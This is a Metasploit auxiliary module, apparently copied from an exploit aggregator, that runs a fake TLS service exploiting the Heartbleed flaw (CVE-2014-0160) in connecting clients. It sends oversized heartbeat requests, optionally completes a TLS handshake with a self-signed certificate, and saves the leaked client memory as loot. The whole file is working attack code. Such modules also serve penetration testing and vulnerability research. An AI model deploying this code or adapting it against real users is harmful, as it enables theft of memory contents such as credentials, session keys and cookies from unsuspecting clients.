## https://sploitus.com/exploit?id=PACKETSTORM:180746
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::TcpServer
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'OpenSSL Heartbeat (Heartbleed) Client Memory Exposure',
'Description' => %q{
This module provides a fake SSL service that is intended to
leak memory from client systems as they connect. This module is
hardcoded for using the AES-128-CBC-SHA1 cipher.
},
'Author' =>
[
'Neel Mehta', # Vulnerability discovery
'Riku', # Vulnerability discovery
'Antti', # Vulnerability discovery
'Matti', # Vulnerability discovery
'hdm' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [['Capture', 'Description' => 'Run server to disclose memory from incoming clients']],
'PassiveActions' => ['Capture'],
'DefaultAction' => 'Capture',
'References' =>
[
[ 'CVE', '2014-0160' ],
[ 'US-CERT-VU', '720951' ],
[ 'URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA14-098A' ],
[ 'URL', 'http://heartbleed.com/' ]
],
'DisclosureDate' => 'Apr 07 2014',
'Notes' =>
{
'AKA' => ['Heartbleed']
}
)
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8443 ]),
OptInt.new('HEARTBEAT_LIMIT', [true, "The number of kilobytes of data to capture at most from each client", 512]),
OptInt.new('HEARTBEAT_READ', [true, "The number of bytes to leak in the heartbeat response", 65535]),
OptBool.new('NEGOTIATE_TLS', [true, "Set this to true to negotiate TLS and often leak more data at the cost of CA validation", false])
])
end
# Initialize the client state and RSA key for this session
def setup
super
@state = {}
@cert_key = OpenSSL::PKey::RSA.new(1024){ } if negotiate_tls?
end
# Setup the server module and start handling requests
def run
print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
exploit
end
# Determine how much memory to leak with each request
def heartbeat_read_size
datastore['HEARTBEAT_READ'].to_i
end
# Determine how much heartbeat data to capture at the most
def heartbeat_limit
datastore['HEARTBEAT_LIMIT'].to_i * 1024
end
# Determine whether we should negotiate TLS or not
def negotiate_tls?
!! datastore['NEGOTIATE_TLS']
end
# Initialize a new state for every client
def on_client_connect(c)
@state[c] = {
:name => "#{c.peerhost}:#{c.peerport}",
:ip => c.peerhost,
:port => c.peerport,
:heartbeats => "",
:server_random => [Time.now.to_i].pack("N") + Rex::Text.rand_text(28)
}
print_status("#{@state[c][:name]} Connected")
end
# Buffer messages and parse them once they are fully received
def on_client_data(c)
data = c.get_once
return if not data
@state[c][:buff] ||= ""
@state[c][:buff] << data
process_request(c)
end
# Extract TLS messages from the buffer and process them
def process_request(c)
# Make this slightly harder to DoS
if @state[c][:buff].to_s.length > (1024*128)
print_status("#{@state[c][:name]} Buffer limit reached, dropping connection")
c.close
return
end
# Process any buffered messages
loop do
break unless @state[c][:buff]
message_type, message_ver, message_len = @state[c][:buff].unpack("Cnn")
break unless message_len
break unless @state[c][:buff].length >= message_len+5
mesg = @state[c][:buff].slice!(0, message_len+5)
if @state[c][:encrypted]
process_openssl_encrypted_request(c, mesg)
else
process_openssl_cleartext_request(c, mesg)
end
end
end
# Process cleartext TLS messages
def process_openssl_cleartext_request(c, data)
message_type, message_version, protocol_version = data.unpack("Cn@9n")
if message_type == 0x15 and data.length >= 7
message_level, message_reason = data[5,2].unpack("CC")
print_status("#{@state[c][:name]} Alert Level #{message_level} Reason #{message_reason}")
if message_level == 2 and message_reason == 0x30
print_status("#{@state[c][:name]} Client rejected our certificate due to unknown CA")
return
end
if level == 2
print_status("#{@state[c][:name]} Client rejected our connection with a fatal error: #{message_reason}")
return
end
end
unless message_type == 0x18
message_code = data[5,1].to_s.unpack("C").first
vprint_status("#{@state[c][:name]} Message #{sprintf("type %.2x v%.4x %.2x", message_type, message_version, message_code)}")
end
# Process the Client Hello
unless @state[c][:received_hello]
unless (message_type == 0x16 and data.length > 43 and message_code == 0x01)
print_status("#{@state[c][:name]} Expected a Client Hello, received #{sprintf("type %.2x code %.2x", message_type, message_code)}")
return
end
print_status("#{@state[c][:name]} Processing Client Hello...")
# Extract the client_random needed to compute the master key
@state[c][:client_random] = data[11,32]
@state[c][:received_hello] = true
print_status("#{@state[c][:name]} Sending Server Hello...")
openssl_send_server_hello(c, data, protocol_version)
return
end
# If we are negotiating TLS, handle Client Key Exchange/Change Cipher Spec
if negotiate_tls?
# Process the Client Key Exchange
if message_type == 0x16 and data.length > 11 and message_code == 0x10
print_status("#{@state[c][:name]} Processing Client Key Exchange...")
premaster_length = data[9, 2].unpack("n").first
# Extract the pre-master secret in encrypted form
if data.length >= 11 + premaster_length
premaster_encrypted = data[11, premaster_length]
# Decrypt the pre-master secret using our RSA key
premaster_clear = @cert_key.private_decrypt(premaster_encrypted) rescue nil
@state[c][:premaster] = premaster_clear if premaster_clear
end
end
# Process the Change Cipher Spec and switch to encrypted communications
if message_type == 0x14 and message_code == 0x01
print_status("#{@state[c][:name]} Processing Change Cipher Spec...")
initialize_encryption_keys(c)
return
end
# Otherwise just start capturing heartbeats in clear-text mode
else
# Send heartbeat requests
if @state[c][:heartbeats].length < heartbeat_limit
openssl_send_heartbeat(c, protocol_version)
end
# Process cleartext heartbeat replies
if message_type == 0x18
vprint_status("#{@state[c][:name]} Heartbeat received (#{data.length-5} bytes) [#{@state[c][:heartbeats].length} bytes total]")
@state[c][:heartbeats] << data[5, data.length-5]
end
# Full up on heartbeats, disconnect the client
if @state[c][:heartbeats].length >= heartbeat_limit
print_status("#{@state[c][:name]} Heartbeats received [#{@state[c][:heartbeats].length} bytes total]")
store_captured_heartbeats(c)
c.close()
end
end
end
# Process encrypted TLS messages
def process_openssl_encrypted_request(c, data)
message_type, message_version, protocol_version = data.unpack("Cn@9n")
return if @state[c][:shutdown]
return unless data.length > 5
buff = decrypt_data(c, data[5, data.length-5])
unless buff
print_error("#{@state[c][:name]} Failed to decrypt, giving up on this client")
c.close
return
end
message_code = buff[0,1].to_s.unpack("C").first
vprint_status("#{@state[c][:name]} Message #{sprintf("type %.2x v%.4x %.2x", message_type, message_version, message_code)}")
if message_type == 0x16
print_status("#{@state[c][:name]} Processing Client Finished...")
end
# Send heartbeat requests
if @state[c][:heartbeats].length < heartbeat_limit
openssl_send_heartbeat(c, protocol_version)
end
# Process heartbeat replies
if message_type == 0x18
vprint_status("#{@state[c][:name]} Encrypted heartbeat received (#{buff.length} bytes) [#{@state[c][:heartbeats].length} bytes total]")
@state[c][:heartbeats] << buff
end
# Full up on heartbeats, disconnect the client
if @state[c][:heartbeats].length >= heartbeat_limit
print_status("#{@state[c][:name]} Encrypted heartbeats received [#{@state[c][:heartbeats].length} bytes total]")
store_captured_heartbeats(c)
c.close()
end
end
# Dump captured memory to a file on disk using the loot API
def store_captured_heartbeats(c)
if @state[c][:heartbeats].length > 0
begin
path = store_loot(
"openssl.heartbleed.client",
"application/octet-stream",
@state[c][:ip],
@state[c][:heartbeats],
nil,
"OpenSSL Heartbleed client memory"
)
print_good("#{@state[c][:name]} Heartbeat data stored in #{path}")
rescue ::Interrupt
raise $!
rescue ::Exception
print_error("#{@state[c][:name]} Heartbeat data could not be stored: #{$!.class} #{$!}")
end
# Report the memory disclosure as a vulnerability on the host
report_vuln({
:host => @state[c][:ip],
:name => self.name,
:info => "Module #{self.fullname} successfully dumped client memory contents",
:refs => self.references,
:exploited_at => Time.now.utc
}) rescue nil # Squash errors related to ip => 127.0.0.1 and the like
end
# Clear the heartbeat array
@state[c][:heartbeats] = ""
@state[c][:shutdown] = true
end
# Delete the state on connection close
def on_client_close(c)
# Do we have any pending heartbeats to save?
if @state[c][:heartbeats].length > 0
store_captured_heartbeats(c)
end
@state.delete(c)
end
# Send an OpenSSL Server Hello response
def openssl_send_server_hello(c, hello, version)
# If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use the
# first cipher suite sent by the client.
if @state[c][:encrypted]
cipher = "\x00\x2F"
else
cipher = hello[46, 2]
end
# Create the Server Hello response
extensions =
"\x00\x0f\x00\x01\x01" # Heartbeat
server_hello_payload =
[version].pack('n') + # Use the protocol version sent by the client.
@state[c][:server_random] + # Random (Timestamp + Random Bytes)
"\x00" + # Session ID
cipher + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA)
"\x00" + # Compression Method (none)
[extensions.length].pack('n') + extensions
server_hello = [0x02].pack("C") + [ server_hello_payload.length ].pack("N")[1,3] + server_hello_payload
msg1 = "\x16" + [version].pack('n') + [server_hello.length].pack("n") + server_hello
c.put(msg1)
# Skip the rest of TLS if we arent negotiating it
unless negotiate_tls?
# Send a heartbeat request to start the stream and return
openssl_send_heartbeat(c, version)
return
end
# Certificates
certs_combined = generate_certificates
pay2 = "\x0b" + [ certs_combined.length + 3 ].pack("N")[1, 3] + [ certs_combined.length ].pack("N")[1, 3] + certs_combined
msg2 = "\x16" + [version].pack('n') + [pay2.length].pack("n") + pay2
c.put(msg2)
# End of Server Hello
pay3 = "\x0e\x00\x00\x00"
msg3 = "\x16" + [version].pack('n') + [pay3.length].pack("n") + pay3
c.put(msg3)
end
# Send the heartbeat request that results in memory exposure
def openssl_send_heartbeat(c, version)
c.put "\x18" + [version].pack('n') + "\x00\x03\x01" + [heartbeat_read_size].pack("n")
end
# Pack the certificates for use in the TLS reply
def generate_certificates
certs = []
certs << generate_certificate.to_der
certs_combined = certs.map { |cert| [ cert.length ].pack("N")[1, 3] + cert }.join
end
# Generate a self-signed certificate to use for the service
def generate_certificate
key = @cert_key
cert = OpenSSL::X509::Certificate.new
cert.version = 2
cert.serial = rand(0xFFFFFFFF)
subject_cn = Rex::Text.rand_hostname
subject = OpenSSL::X509::Name.new([
["C","US"],
['ST', Rex::Text.rand_state()],
["L", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],
["O", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],
["CN", subject_cn],
])
issuer = OpenSSL::X509::Name.new([
["C","US"],
['ST', Rex::Text.rand_state()],
["L", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],
["O", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],
["CN", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],
])
cert.subject = subject
cert.issuer = issuer
cert.not_before = Time.now - (3600 * 24 * 365) + rand(3600 * 14)
cert.not_after = Time.now + (3600 * 24 * 365) + rand(3600 * 14)
cert.public_key = key.public_key
ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)
cert.extensions = [
ef.create_extension("basicConstraints","CA:FALSE"),
ef.create_extension("subjectKeyIdentifier","hash"),
ef.create_extension("extendedKeyUsage","serverAuth"),
ef.create_extension("keyUsage","keyEncipherment,dataEncipherment,digitalSignature")
]
ef.issuer_certificate = cert
cert.add_extension ef.create_extension("authorityKeyIdentifier", "keyid:always,issuer:always")
cert.sign(key, OpenSSL::Digest.new('SHA1'))
cert
end
# Decrypt the TLS message and return the result without the MAC
def decrypt_data(c, data)
return unless @state[c][:client_enc]
cipher = @state[c][:client_enc]
begin
buff = cipher.update(data)
buff << cipher.final
# Trim the trailing MAC signature off the buffer
if buff.length >= 20
return buff[0, buff.length-20]
end
rescue ::OpenSSL::Cipher::CipherError => e
print_error("#{@state[c][:name]} Decryption failed: #{e}")
end
nil
end
# Calculate keys and toggle encrypted status
def initialize_encryption_keys(c)
tls1_calculate_crypto_keys(c)
@state[c][:encrypted] = true
end
# Determine crypto keys for AES-128-CBC based on the master secret
def tls1_calculate_crypto_keys(c)
@state[c][:master] = tls1_calculate_master_key(c)
return unless @state[c][:master]
key_block = tls1_prf(
@state[c][:master],
"key expansion" + @state[c][:server_random] + @state[c][:client_random],
(20 * 2) + (16 * 4)
)
# Extract the MAC, encryption, and IV from the keyblock
@state[c].update({
:client_write_mac_key => key_block.slice!(0, 20),
:server_write_mac_key => key_block.slice!(0, 20),
:client_write_key => key_block.slice!(0, 16),
:server_write_key => key_block.slice!(0, 16),
:client_iv => key_block.slice!(0, 16),
:server_iv => key_block.slice!(0, 16),
})
client_cipher = OpenSSL::Cipher.new('aes-128-cbc')
client_cipher.decrypt
client_cipher.key = @state[c][:client_write_key]
client_cipher.iv = @state[c][:client_iv]
client_mac = OpenSSL::HMAC.new(@state[c][:client_write_mac_key], OpenSSL::Digest.new('sha1'))
server_cipher = OpenSSL::Cipher.new('aes-128-cbc')
server_cipher.encrypt
server_cipher.key = @state[c][:server_write_key]
server_cipher.iv = @state[c][:server_iv]
server_mac = OpenSSL::HMAC.new(@state[c][:server_write_mac_key], OpenSSL::Digest.new('sha1'))
@state[c].update({
:client_enc => client_cipher,
:client_mac => client_mac,
:server_enc => server_cipher,
:server_mac => server_mac
})
true
end
# Determine the master key from the premaster and client/server randoms
def tls1_calculate_master_key(c)
return unless (
@state[c][:premaster] and
@state[c][:client_random] and
@state[c][:server_random]
)
tls1_prf(
@state[c][:premaster],
"master secret" + @state[c][:client_random] + @state[c][:server_random],
48
)
end
# Random generator used to calculate key data for TLS 1.0/1.1
def tls1_prf(input_secret, input_label, output_length)
# Calculate S1 and S2 as even blocks of each half of the secret
# string. If the blocks are uneven, then S1's last byte should
# be duplicated by S2's first byte
blen = (input_secret.length / 2.0).ceil
s1 = input_secret[0, blen]
s2_index = blen
if input_secret.length % 2 != 0
s2_index -= 1
end
s2 = input_secret[s2_index, blen]
# Hash the first part with MD5
out1 = tls1_p_hash('md5', s1, input_label, output_length).unpack("C*")
# Hash the second part with SHA1
out2 = tls1_p_hash('sha1', s2, input_label, output_length).unpack("C*")
# XOR the results together
[*(0..out1.length-1)].map {|i| out1[i] ^ out2[i] }.pack("C*")
end
# Used by tls1_prf to generate arbitrary amounts of session key data
def tls1_p_hash(digest, secret, label, olen)
output = ""
chunk = OpenSSL::Digest.new(digest).digest_length
ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))
ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))
ctx.update(label)
a1 = ctx.digest
loop do
ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))
ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))
ctx.update(a1)
ctx_tmp.update(a1)
ctx.update(label)
if olen > chunk
output << ctx.digest
a1 = ctx_tmp.digest
olen -= chunk
else
a1 = ctx.digest
output << a1[0, olen]
break
end
end
output
end
end